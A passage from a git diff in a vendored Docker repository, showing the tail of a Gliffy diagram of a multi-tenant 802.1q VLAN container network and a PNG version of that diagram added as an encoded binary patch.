hape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":232,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":41,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.19934
7471451986,"rotation":0.0,"id":233,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":54,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container2 - vlan20

172.16.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":259.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":248,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":56,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":265.14756722151094,"y":139.96785409109907,"rotation":0.0,"id":241,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":73,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":242,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":61,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":243,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":70,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":246,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[
1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":244,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":67,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":245,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":246,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":59,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"la
yerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":247,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":72,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container3 - vlan30

10.1.1.2/16

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":31.199996948242188,"rotation":0.0,"id":253,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":74,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.30

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.49612211422149,"y":17.874999999999943,"rotation":0.0,"id":266,"width":275.00609168449375,"height":15.70000000000006,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":75,"lockAspectRatio":false,"lockShape":false,"children":[{"x":68.50387788577851,"y":43.12500000000006,"rotation":0.0,"id":258,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-31.924999999999997],[197.00221379871527,-31.925000000000153]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.50387788577851,"y":38.55333333333314,"rotation":0.0,"id":262,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":40.7533333333331,"rotation":0.0,"id":261,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":5,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"end
Arrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":42.88666666666643,"rotation":0.0,"id":260,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":73.50387788577851,"y":43.95333333333309,"rotation":0.0,"id":259,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#ffe599","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":248.0,"y":51.19999694824219,"rotation":0.0,"id":207,"width":143.0,"height":70.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"ou
terPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Router (gateway)

vlan10 - 192.168.1.1/24

vlan20 - 172.16.1.1/24

vlan30 - 10.1.1.1/16

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":88.19999694824219,"rotation":0.0,"id":272,"width":77.99999999999999,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":76,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":80}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#e06666","strokeWidth":2,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457586821719,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png new file mode 100644 index 0000000000000000000000000000000000000000..a38633cdbc23014364bfc611d650b2a17dc72ae0 GIT binary patch literal 17879 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 
